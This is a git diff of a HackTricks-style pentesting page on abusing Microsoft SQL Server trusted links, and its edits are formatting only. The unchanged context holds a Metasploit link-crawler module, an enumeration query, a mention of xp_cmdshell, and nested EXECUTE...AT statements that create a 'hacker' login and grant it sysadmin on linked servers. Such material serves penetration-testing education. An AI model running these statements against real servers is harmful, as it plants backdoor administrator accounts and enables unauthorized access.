@ -89,7 +88,7 @@ msf> use exploit/windows/mssql/mssql_linkcrawler
|
|||
|
||||
Notice that metasploit will try to abuse only the `openquery()` function in MSSQL (so, if you can't execute command with `openquery()` you will need to try the `EXECUTE` method **manually** to execute commands, see more below.)
|
||||
|
||||
## Manual - Openquery()
|
||||
### Manual - Openquery()
|
||||
|
||||
From Linux you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py** and run queries like:
|
||||
|
||||
|
@ -101,10 +100,10 @@ From Windows you could also find the links and execute commands manually using a
|
|||
|
||||
_Login using Windows authentication:_
|
||||
|
||||
![](<../../.gitbook/assets/image (167).png>)
|
||||
![](<../../.gitbook/assets/image (167) (1).png>)
|
||||
|
||||
_Find links inside the accessible MSSQL server (in this case the link is to dcorp-sql1):_\
|
||||
__`select * from master..sysservers`
|
||||
\_\_`select * from master..sysservers`
|
||||
|
||||
![](<../../.gitbook/assets/image (168).png>)
|
||||
|
||||
|
@ -117,7 +116,7 @@ You can continue these trusted links chain forever manually.
|
|||
|
||||
Some times you won't be able to perform actions like `exec xp_cmdshell` from `openquery()` in those cases it might be worth it to test the following method:
|
||||
|
||||
## Manual - EXECUTE
|
||||
### Manual - EXECUTE
|
||||
|
||||
You can also abuse trusted links using EXECUTE:
|
||||
|
||||
|
@ -127,8 +126,6 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '')
|
|||
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -144,5 +141,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|